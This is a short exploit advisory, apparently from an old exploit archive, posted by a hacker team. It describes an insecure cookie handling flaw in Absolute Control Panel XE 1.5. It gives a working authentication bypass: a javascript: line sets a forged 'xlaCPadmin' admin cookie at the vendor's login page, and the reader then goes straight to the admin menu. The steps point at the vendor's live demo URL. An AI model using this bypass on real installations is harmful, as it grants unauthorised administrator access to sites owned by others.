Absolute Control Panel XE version 1.5 suffers from a remote cookie handling vulnerability.
692d052bff70f3969070fb053c2675c8a694b5843ef0c9fb83592a9a2bfbf096
###############################################################################################
_____ ____ __ ___ ______ ______ | ____ _____ _____
| / ___| \ \ / / / ____| / | | | | _ \ |
|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____
| | |_ || | | | |____ | | | | | | _ | |
|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______|
[~] Discovered By : Hakxer
[~] Home : Www.educ-up.com
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Control Panel XE [see script] http://www.xigla.com/absolutecp/demo.htm
[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member
[~] Team : EgY Coders
#################################################################################################
Exploit : First go to http://www.xigla.com/absolutecp/xlaabsolutecp/login.asp
Second Execute JS Code
[~] javascript:document.cookie="xlaCPadmin=lvl=1&email=email@here.com&pwd=admin&usr=admin&userid=1";
Now Go to http://www.xigla.com/absolutecp/xlaabsolutecp/menu.asp
--- Proud To Be A Muslim ---
# _=END=_ #